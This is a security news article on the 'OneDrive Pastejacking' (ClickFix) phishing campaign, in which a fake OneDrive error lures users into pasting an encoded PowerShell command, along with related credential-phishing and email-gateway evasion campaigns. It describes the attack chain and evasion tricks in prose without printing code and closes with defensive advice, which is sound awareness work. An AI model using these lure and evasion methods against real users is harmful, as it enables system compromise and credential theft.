New Phishing Scam Targets OneDrive Users with Malicious Script

Cybersecurity researchers are alerting the public about a new phishing campaign aimed at Microsoft OneDrive users, intending to execute a harmful PowerShell script.

“This campaign relies heavily on social engineering tactics to trick users into running a PowerShell script, which compromises their systems,” said security researcher.

The cybersecurity firm is monitoring this clever phishing and downloader campaign under the name OneDrive Pastejacking.

The attack begins with an email containing an HTML file. When opened, the file displays an image mimicking a OneDrive page and shows an error message stating: “Failed to connect to the ‘OneDrive’ cloud service. To fix the error, you need to update the DNS cache manually.”

The email presents two options: “How to fix” and “Details.” Clicking on “Details” takes the recipient to a legitimate Microsoft Learn page on Troubleshooting DNS. However, selecting “How to fix” guides the user through steps involving pressing “Windows Key + X” to open the Quick Link menu, launching the PowerShell terminal, and pasting a Base64-encoded command to supposedly resolve the issue.

“The command initially runs ipconfig /flushdns, creates a folder on the C: drive named ‘downloads,’ and then downloads an archive file to this location,” Researcher explained. “It renames the file, extracts its contents (‘script.a3x’ and ‘AutoIt3.exe’), and executes script.a3x using AutoIt3.exe.”

This campaign has targeted users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.

The disclosure builds on similar findings from ReliaQuest, Proofpoint, and McAfee Labs, indicating that phishing attacks using this method, also known as ClickFix, are becoming more common.

This development follows the discovery of a new email-based social engineering campaign distributing fake Windows shortcut files that lead to the execution of malicious payloads hosted on Discord’s Content Delivery Network (CDN) infrastructure.

Phishing campaigns have also been increasingly observed sending emails with links to Microsoft Office Forms from previously compromised legitimate email accounts. These emails entice targets to divulge their Microsoft 365 login credentials under the guise of restoring their Outlook messages.

“Attackers create legitimate-looking forms on Microsoft Office Forms, embedding malicious links within them,” Researcher said. “These forms are sent en masse via email, pretending to be legitimate requests such as password changes or access to important documents, mimicking trusted platforms like Adobe or Microsoft SharePoint.”

Moreover, other attacks have used invoice-themed lures to trick victims into sharing their credentials on phishing pages hosted on Cloudflare R2, which then exfiltrate the data to the threat actor via a Telegram bot.

It’s evident that adversaries are continuously finding new ways to stealthily bypass Secure Email Gateways (SEGs) to increase the success rate of their attacks.

According to a recent report, attackers are exploiting how SEGs scan ZIP archive attachments to deliver the Formbook information stealer using DBatLoader (also known as ModiLoader and NatsoLoader).

This method involves disguising the HTML payload as an MPEG file to evade detection. Many common archive extractors and SEGs parse the file header information but ignore the file footer, which might contain more accurate information about the file format.

To prevent falling victim to such phishing scams, always verify the authenticity of emails and websites before taking any action. Avoid clicking on links or downloading attachments from unknown sources. Use comprehensive security solutions that provide real-time phishing protection, and enable multi-factor authentication (MFA) on your accounts to add an extra layer of security.

Leave a Comment

Your email address will not be published. Required fields are marked *